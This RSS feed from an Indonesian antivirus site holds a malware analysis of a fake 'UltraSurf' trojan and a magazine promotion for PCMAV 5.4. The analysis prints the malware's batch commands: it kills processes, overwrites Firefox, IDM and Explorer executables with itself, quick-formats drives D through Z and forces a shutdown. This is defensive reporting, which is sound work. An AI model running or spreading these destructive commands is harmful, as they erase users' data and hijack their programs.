<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>pcmav.biz Best Indonesian Antivirus &#187; pcmav</title>
	<atom:link href="http://pcmav.biz/category/pcmav/feed" rel="self" type="application/rss+xml" />
	<link>http://pcmav.biz</link>
	<description>No Virus Allowed</description>
	<lastBuildDate>Sun, 06 May 2012 07:08:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>UltraSurf: Memformat Semua Hard Disk</title>
		<link>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html</link>
		<comments>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html#comments</comments>
		<pubDate>Sat, 06 Aug 2011 07:00:42 +0000</pubDate>
		<dc:creator>pcmav</dc:creator>
				<category><![CDATA[download]]></category>
		<category><![CDATA[pcmav]]></category>
		<category><![CDATA[update]]></category>

		<guid isPermaLink="false">http://pcmav.biz/?p=1096</guid>
		<description><![CDATA[&#160; UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/1.msg_.png"><img class="aligncenter size-full wp-image-1098" title="1.msg" src="http://pcmav.biz/wp-content/uploads/2012/05/1.msg_.png" alt="1.msg  UltraSurf: Memformat Semua Hard Disk" width="529" height="209" /></a></p>
<p>UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.<span id="more-1096"></span></p>
<p><strong>A. Info File</strong></p>
<p>Nama Worm : UltraSurf<br />
Asal : Indonesia<br />
Ukuran File : Random<br />
Packer : UPX 0.89 – 3.xx -&gt; Markus &amp; Laszlo ver. [ 3.07 ]<br />
Pemrograman : Delphi<br />
Icon : Random<br />
Tipe : Trojan, Worm</p>
<p><strong>B. About Malware</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/2.variant.png"><img class="aligncenter size-full wp-image-1099" title="2.variant" src="http://pcmav.biz/wp-content/uploads/2012/05/2.variant.png" alt="2.variant UltraSurf: Memformat Semua Hard Disk" width="302" height="77" /></a></p>
<p>Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.</p>
<p>Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.</p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/3.hexa_.png"><img class="aligncenter size-full wp-image-1100" title="3.hexa" src="http://pcmav.biz/wp-content/uploads/2012/05/3.hexa_.png" alt="3.hexa  UltraSurf: Memformat Semua Hard Disk" width="500" /></a></p>
<p><strong>C. Companion/File yang dibuat</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/4.batfile.png"><img class="aligncenter size-full wp-image-1101" title="4.batfile" src="http://pcmav.biz/wp-content/uploads/2012/05/4.batfile.png" alt="4.batfile UltraSurf: Memformat Semua Hard Disk" width="384" height="71" /></a></p>
<p>Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.</p>
<p><strong>D. Hasil Infeksi</strong><br />
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.<br />
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe</p>
<blockquote><p>taskkill /f /im idman.exe<br />
taskkill /f /im firefox.exe<br />
taskkill /f /im explorer.exe</p></blockquote>
<p>mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe</p>
<blockquote><p>xcopy ultrasurf.exe /h /r /c /y &#8220;C:\Program Files\Internet Download Manager\IDMan.exe&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\Program Files\Mozilla Firefox\firefox.exe&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\windows\explorer&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\windows\explorer.exe&#8221;</p></blockquote>
<p>Memformat semua hard disk mulai dari drive D sampai Z.</p>
<blockquote><p>echo.<br />
Format D: /Q /X /y<br />
echo.<br />
Format E: /Q /X /y<br />
echo.<br />
Format F: /Q /X /y<br />
echo.<br />
Format G: /Q /X /y<br />
echo.<br />
Format H: /Q /X /y<br />
echo.<br />
Format I: /Q /X /y<br />
echo.<br />
Format J: /Q /X /y<br />
echo.<br />
Format K: /Q /X /y<br />
echo.<br />
Format L: /Q /X /y<br />
echo.<br />
Format M: /Q /X /y<br />
echo.<br />
Format N: /Q /X /y<br />
echo.<br />
Format 0: /Q /X /y<br />
echo.<br />
Format P: /Q /X /y<br />
echo.<br />
Format Q: /Q /X /y<br />
echo.<br />
Format R: /Q /X /y<br />
echo.<br />
Format S: /Q /X /y<br />
echo.<br />
Format T: /Q /X /y<br />
echo.<br />
Format U: /Q /X /y<br />
echo.<br />
Format V: /Q /X /y<br />
echo.<br />
Format W: /Q /X /y<br />
echo.<br />
Format X: /Q /X /y<br />
echo.<br />
Format Y: /Q /X /y<br />
echo.<br />
Format Z: /Q /X /y</p></blockquote>
<p>Dan yang terakhir adalah melakukan proses shuting down</p>
<blockquote><p>start shutdown.exe -f -t 0 –s</p></blockquote>
<p>Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.</p>
<p><strong>E. Pembersihan</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/5.pcmav_.png"><img class="aligncenter size-full wp-image-1102" title="5.pcmav" src="http://pcmav.biz/wp-content/uploads/2012/05/5.pcmav_.png" alt="5.pcmav  UltraSurf: Memformat Semua Hard Disk" width="500" /></a></p>
<p><strong>PCMAV 5.4 Update Build1</strong></p>
<p>Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.</p>
<p>Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.</p>
<p>Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:</p>
<p><a title="SendSpace.com" href="http://www.sendspace.com/file/z0y1vd">SendSpace.com</a></p>
<p><a title="zippyshare.com" href="http://www2.zippyshare.com/v/8678932/file.html">ZippyShare.com</a> (mirror)</p>
<p><a title="RapidShare.com" href="https://rapidshare.com/files/146006781/update.vdb">RapidShare.com</a> (mirror)</p>
<p>Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.</p>
<p>Daftar tambahan virus hingga PCMAV 5.4 Update Build1:</p>
<p>Fandi.vbs.C<br />
Fandi.vbs.C.inf<br />
NgrBot<br />
NgrBot.bat<br />
NgrBot.dat<br />
NgrBot.drp.A<br />
NgrBot.drp.B<br />
NgrBot.exe.A<br />
NgrBot.exe.B<br />
NgrBot.inf<br />
NgrBot.lnk<br />
Pluto.C<br />
Pluto.C.drp<br />
Pluto.C.htm<br />
Redlof.vbs.B<br />
Redlof.vbs.B.drp<br />
Redlof.vbs.B.inf<br />
RezaTera.B<br />
RezaTera.B.drp<br />
RezaTera.B.url<br />
Rieysha-Jogja.E<br />
Rieysha-Jogja.E.hosts<br />
Rieysha-Jogja.E.vbs<br />
UltraSurf.A<br />
UltraSurf.A.bat<br />
UltraSurf.B<br />
UltraSurf.C<br />
UltraSurf.D<br />
UltraSurf.D.bat</p>
<p>taskkill /f /im idman.exe</p>
]]></content:encoded>
			<wfw:commentRss>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Majalah PC Media 08/2011 &amp; PCMAV 5.4</title>
		<link>http://pcmav.biz/majalah-pc-media-082011-pcmav-5-4.html</link>
		<comments>http://pcmav.biz/majalah-pc-media-082011-pcmav-5-4.html#comments</comments>
		<pubDate>Sat, 06 Aug 2011 06:56:37 +0000</pubDate>
		<dc:creator>pcmav</dc:creator>
				<category><![CDATA[pcmav]]></category>

		<guid isPermaLink="false">http://pcmav.biz/?p=1092</guid>
		<description><![CDATA[Telah hadir edisi terbaru Majalah PC Media 08/2011 dengan Super DVD 8 GB, yang menyertakan juga antivirus kebanggaan Indonesia, PCMAV 5.4. Saat ini, PCMAV merupakan satu-satunya antivirus yang mampu mengenali 4.466 virus dan variannya yang dilaporkan banyak menyebar di Indonesia. Segera dapatkan PCMAV 5.4 Valhalla terbaru yang telah disempurnakan hanya dari majalah PC Media 08/2011 [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/Cover-PCM-REG_08.png"><img class="aligncenter size-full wp-image-1093" title="Cover-PCM-REG_08" src="http://pcmav.biz/wp-content/uploads/2012/05/Cover-PCM-REG_08.png" alt="Cover PCM REG 08 Majalah PC Media 08/2011 & PCMAV 5.4" width="420" height="544" /></a></p>
<p>Telah hadir edisi terbaru <strong>Majalah PC Media 08/2011</strong> dengan Super DVD 8 GB, yang menyertakan juga antivirus kebanggaan Indonesia, <strong>PCMAV 5.4</strong>. Saat ini, PCMAV merupakan satu-satunya antivirus yang mampu mengenali 4.466 virus dan variannya yang dilaporkan banyak menyebar di Indonesia.<span id="more-1092"></span></p>
<p>Segera dapatkan PCMAV 5.4 Valhalla terbaru yang telah disempurnakan hanya dari majalah PC Media 08/2011 yang telah terbit. Segera pesan dan dapatkan di kios/agen terdekat.</p>
<p>Pertanyaan teknis harap disampaikan langsung ke redaksi PC Media melalui e-mail dengan sebelumnya Anda telah membaca dan memahami isi README.TXT. Dan kami akan berterimakasih jika Anda dapat meluangkan waktu untuk memberikan komentar sebatas penggunaan PCMAV 5.4 ini sebagai masukan dalam pengembangannya.</p>
<p><strong>APA YANG BARU?/CHANGE-LOG</strong><br />
UPDATED! Ditambahkan database pengenal dan pembersih 116 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 4466 virus beserta variannya.<br />
ADDED! Removal engine khusus untuk membersihkan secara tuntas virus Ramnit.L, Ramnit.M, dan OjanBlank.B yang menyebar luas di Indonesia.<br />
ADDED! Removal engine khusus untuk memulihkan file JPEG yang terinfeksi virus Parents.<br />
FIXED! Perbaikan dalam membuka dokumen Office pada removable disk apabila opsi Block Program On USB/Card tidak diaktifkan.<br />
IMPROVED! Perubahan nama virus mengikuti varian baru yang ditemukan.<br />
IMPROVED! Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV tetap menjadi antivirus kebanggaan Indonesia.</p>
<p><strong>ARTIKEL MALWARE &amp; REVERSE CODE ENGINEERING</strong></p>
<p>Pada majalah PC Media 08/2011 ini, Anda dapat membaca artikel menyangkut Malware &amp; Reverse Code Engineering (RCE):</p>
<p><strong>Malware Dalam Dokumen.</strong></p>
<p>Kebiasaan rutin dapat menjadi kelemahan. Setidaknya dalam perkembangan malware, kebiasaan-kebiasaan pengguna komputer terus dipelajari oleh pembuat malware agar dapat dimanfaatkan sebagai celah untuk menyusup. Salah satunya adalah menginfeksi dokumen yang sering digunakan pengguna umum. Artikel ini membahas bagaimana malware dapat menyusup ke berbagai jenis dokumen yang sering digunakan sehari-hari.</p>
<p><strong>Modifikasi Malware.</strong></p>
<p>“Menciptakan” malware baru yang berusaha melewati deteksi antivirus ternyata tidak selalu harus melalui pemrograman yang rumit. Cukup dengan memodifikasi malware yang sudah ada, maka lahirlah sebuah varian baru yang bisa jadi lolos dari pendeteksian sebagian antivirus yang sebelumnya mampu mendeteksi malware tersebut (sebelum dimodifikasi). Ikuti teknik-teknik modifikasi malware yang cukup mudah dilakukan pada artikel ini, siapa tahu mungkin Anda akan tertantang untuk menemukan cara pencegahannya.</p>
<p><strong>Hacking Dengan Trojan Backdoor</strong></p>
<p>Walaupun istilah trojan dan backdoor sudah dikenal lama, tetapi tipe malware inilah yang saat ini cukup menjadi ancaman serius, dipicu dengan perkembangan Internet yang cepat dan pengguna yang semakin banyak, membuat malware jenis ini menyebar dengan pesat dan berusaha mengeruk keuntungan finansial. Untuk itu, kenali ancaman tersebut lebih dekat, bagaimana cara kerja dan juga tips untuk mendeteksinya.</p>
]]></content:encoded>
			<wfw:commentRss>http://pcmav.biz/majalah-pc-media-082011-pcmav-5-4.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

